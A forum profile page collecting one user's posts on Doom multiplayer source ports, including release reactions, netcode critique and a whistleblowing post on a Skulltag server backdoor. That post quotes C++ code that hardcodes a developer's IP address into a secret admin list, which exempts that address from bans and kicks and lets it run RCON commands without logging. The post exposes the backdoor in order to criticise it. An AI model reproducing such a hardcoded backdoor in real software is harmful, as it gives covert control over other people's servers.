Jump to content
Search In
  • More options...
Find results that contain...
Find results in...


  • Content count

  • Joined

  • Last visited

About mandax

  • Rank
    Warming Up

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

  1. mandax

    ZDaemon 1.09 Released

    Is there an option to turn off the butthurt? ;) Seriously, you should be very familiar with that option since you have been using it for years yourself. It is called master_advertise. I hope you are not asking because a reversal of change is imminent. That would be rather amusing.
  2. mandax

    ZDaemon 1.09 Released

    Very good release. An insane amount of features have been added in total. The best online Doom experience at the present time. Just for the record here is the timeline: Zandronum only supports forward skipping.
  3. mandax

    Best Source Port for Co-op currently?

    I play all 3 online ports and I can safely say that ZDaemon delivers the best coop experience.
  4. mandax

    Ask Your Doctor About Zandronum

    {Zandronum} ^ {ZDaemon} = {zdamon} There is 86% ZDaemon in Zandronum ;) Anyways, good luck with the fresh port reboot.
  5. Touché ZDaemon! I for one lol'd. If you can't laugh about this then you take Doom way too serious ;) I'll make sure to attend this event. Missed it the first time it was played.
  6. mandax

    Odamex 0.6 Previews - Now with GPL Slopes

    Good job Odamex team! I really enjoyed watching these videos! What do you mean 'bring back'? Let's be fair, they are probably already playing Skulltag and ZDaemon since then ;). Wanted to comment on the preview video #4, ironically named "Lose The Lag". I'm not sure how useful the implemented features are given Dooms extreme movement speed and here is why: interpolation: Actually adds lag on top of your ping. None of the serious players will enable this feature, because it would be an disadvantage when e.g. the opponent comes around a corner and you could have seen him earlier without interpolating. extrapolation: Seems neat at first, but desyncs the opponents positions. When you miss a couple position updates you start guessing the player position. When you receive the actual position you slowly correct your wrong guess towards the real position. This desync will make it hard to hit the target during the 'resyncing phase'. collision prediction (gradually move towards new position): Same problem as above but this time it is the player position. Your own position is desynced and your aim will be wrong while you slowly move towards your actual position. All of the above looks nice, but is not really useful for 'serious' play imho. I rather have my view snap for a split second and be in the correct position afterwards than remaining in some faulty state that messes my aiming. Even when the correction only lasts a couple ticks, in doom these ticks can be the difference between a good shot or instant death. Can anyone tell me if there are any plans or concepts to battle cheating in odamex? Competitive play will put pressure on players to perform better. I ask this, because when I was watching the preview videos the youtube suggestions already seem to link to a working odamex cheat some idiot programmed :( The modified client presented in the video doesn't seem to leave any traces of "weird behavior" (like aimbots do) that could be verified in demos later. I really don't want to see this great port choked off before it even gets started because of cheaters and mutual distrust ruining it!
  7. mandax

    Odamex Saturday Nitro #1

    The third Odamex news post within nine days? With all due respect, I always had the feeling that DW was somewhat neutral towards each port, but this just looks very biased and does not seem right. All three news items could have been part of a single news post from the start. If the latest Nitro post is worth a separate news post even when it was mentioned in the last Nitro thread already then it is only fair to post FNF, ZDS and FYBO each week as well. Sorry to say this, but it looks to me like a really cheap trick to attract attention and it is really not worthy of a great project like Odamex to resort to such measures.
  8. mandax

    QuakeCon 2011; Carmack Keynote

    at 1:07:55 "You don't want people that aren't really programmers programming, you'll suffer for it." This is so true. *looks at ST and shudders*
  9. mandax

    ZDaemon turns 109 today

    this whole thread in a nutshell: http://img825.imageshack.us/img825/2581/zd109.png
  10. mandax

    Skulltag 0.97c2 Server Backdoor

    I was aware of the OPL emulation being removed and was rather commenting on Gez' flawed implication ... ... that going 'Open Source' would allow the reintroduction of the OPL emulation code. I would be happy if this was indeed the case. The GPL relicensing Torr plans to allow would finally breathe new life into Odamex development as well.
  11. mandax

    Skulltag 0.97c2 Server Backdoor

    Thank you for the answers Torr and sorry for the harsh interrogation ;) Regarding the OPL emulation: + Does not compute! Not a single post I made was edited. You must have missed the 'Open Source' part the first time you read it. Nevertheless I welcome your sudden change of mind 48 hours later to "jump on the bandwagon" yourself.
  12. mandax

    Skulltag 0.97c2 Server Backdoor

    I consider this a very serious issue and I'm surprised by the general apathy it is met with. Makes it seem as if people don't care about backdoors at all. I am not sure why you try to downplay the issue here. It does not matter how effective the backdoor would be today. What matters is the existence of the backdoor in the first place and the implications it has on security and trust! It's nice that we share the same interest regarding open source, but did you even read the rest of my post? Usually I see you weigh in on all kinds of topics with valuable input. It just irritates me that you have nothing to say regarding the main issue at hand. Son ... I am disappoint! Are you afraid to bite the hand that feeds you? ;) Torr I really respect you and all you do for ST, but I have not been expecting such a "politician" like answer ;) If there is no list that is distributed, is there maybe some functionality on the master to check if a player should get some 'special' rights on a server. E.g. "server sends a message to the master about a connected player and the master then checks some list and tells the server whether to set a flag for that player" or anything of that kind? I am explicitly asking about the existence of such a mechanism regardless of it being used or not at the moment (in case the list is empty). When and how did you learn about the backdoor? At what point was the backdoor removed and by whom? When was it introduced for the first time? I'm feeling a bit stupid to even ask these questions, because I expected it would be natural to disclose all information regarding the backdoor when you get caught with your hands in the cookie jar. Then it would be time to review critical parts of the code and to publicly disclose any irregularities that have been found. The last thing I want to see in the future are source code releases with tampered timestamps or binaries build with the same toolchain to have a different hash than the officially released binaries at that time. Or even worse ... no source releases between the last and current version at all.
  13. Firstly - I'm a long time Skulltag player, I love ST and I want to continue to play it, therefore I would like to remain anonymous. Consider this post an act of whistleblowing that will hopefully help improve the port in the end. Some of you might remember the csDoom backdoor incident. The creator of csDoom (Fly) added a backdoor to the server binaries which would grant him RCON rights on any server. A similar backdoor was implemented by Carnevil as can be seen in the recently released 0.97c2 source code. sv_admin.cpp: Here we can see Carnevils hardcoded IP address and a function that will return true, if a given address is included in the Adminlist! Note that this code was written with expandability in mind. void SERVER_ADMIN_Construct( void ) { g_AdminList[ADMIN_CARNEVIL].Address.ip[0] = 24; g_AdminList[ADMIN_CARNEVIL].Address.ip[1] = 242; g_AdminList[ADMIN_CARNEVIL].Address.ip[2] = 214; g_AdminList[ADMIN_CARNEVIL].Address.ip[3] = 13; } bool SERVER_ADMIN_IsAdministrator( netadr_t Address ) { ULONG ulIdx; for ( ulIdx = 0; ulIdx < NUM_ADMINS; ulIdx++ ) { if ( NETWORK_CompareAddress( g_AdminList[ulIdx].Address, Address, true )) return ( true ); } return ( false ); } Let us have a look where this function is used and what IP addresses listed in the secret Adminlist can do: all of the following code is from sv_main.cpp: They cannot be banned from the server!if (( sv_enforcebans ) && ( SERVERBAN_IsIPBanned( szAddress[0], szAddress[1], szAddress[2], szAddress[3] )) && ( SERVER_ADMIN_IsAdministrator( clients[lClient].address ) == false )) { // Client has been banned! GET THE FUCK OUT OF HERE! SERVER_ClientError( lClient, NETWORK_ERRORCODE_BANNED ); return; } They can issue "silent" RCON commands that will not be printed.// If they don't have RCON access, and aren't an adminstrator, deny them the ability to do this. if (( clients[parse_cl].bRCONAccess == false ) && ( SERVER_ADMIN_IsAdministrator( clients[parse_cl].address ) == false )) return ( false ); // Admins can operate incognito. if ( SERVER_ADMIN_IsAdministrator( clients[parse_cl].address ) == false ) Printf( "%s RCON (%s)\n", players[parse_cl].userinfo.netname, pszCommand ); They cannot be kicked from the game or server!if ( stricmp( szPlayerName, argv[1] ) == 0 ) { if ( SERVER_ADMIN_IsAdministrator( clients[ulIdx].address )) continue; // If we provided a reason, give it. if ( argv.argc( ) >= 3 ) SERVER_KickPlayer( ulIdx, argv[2] ); else SERVER_KickPlayer( ulIdx, "None given." ); return; } if ( stricmp( szPlayerName, argv[1] ) == 0 ) { if ( SERVER_ADMIN_IsAdministrator( clients[ulIdx].address )) continue; // Already a spectator! if ( PLAYER_IsTrueSpectator( &players[parse_cl] )) continue; // If we provided a reason, give it. if ( argv.argc( ) >= 3 ) SERVER_KickPlayerFromGame( ulIdx, argv[2] ); else SERVER_KickPlayerFromGame( ulIdx, "None given" ); return; } All of the above probably applies to ScoreDoomST, which is based on 0.97c2, as well. Now this backdoor might or might not be present in the current ST source code. What caught my eye though in the recent changelog was the implementation of a server-side whitelist and adminlist, with similar functionality, meant for server hosts only. For more details check out the Wiki. The Skulltag master-server is distributing a global banlist to all servers. As this and this post suggest a global whitelist is distributed as well. Now what if all the server-side lists have been implemented at the global level and the master-server is also distributing a secret adminlist to all servers (maybe the global adminlist IP checks are done directly on the master though)? If a backdoor of any kind is still present it would be a huge security risk and massive breach of trust between server hosts and the ST administration. Someone who is skilled in Reverse Engineering might want to check the current server master communication for a 'third list' or other suspicious queries to confirm my worries. An official statement from the administration confirming or disputing the existence of a "master adminlist" or any other form of backdoor could clear things up. Since Skulltag is closed source we ultimately have to trust the official statement from the administration. Releasing older source code so we can at least see since when the backdoor was present would be a first step. I guess this incident will make the administration cautious to remove incriminating code from future source code releases though. Some viable options to regain trust would be to go fully open source or allow some neutral members from the DooM community to review the code in person by visiting one of the developers IRL. I know that some prominent figures from the doom community, like AlexMax, Ladna, Gez and Graf Zahl, are actively pushing for Skulltag to be open sourced. Ladna said it best in the previously linked altdeath thread: He is absolutely right! The players should have all the power. The programmers should just do their job and write code instead. If the programmers or admins try to deceive the players the project can be forked easily! I would be very pleased if ST became a truly free port like Odamex and they could finally share code and join forces! Maybe this negative incident here can be turned into something positive and accelerate that process.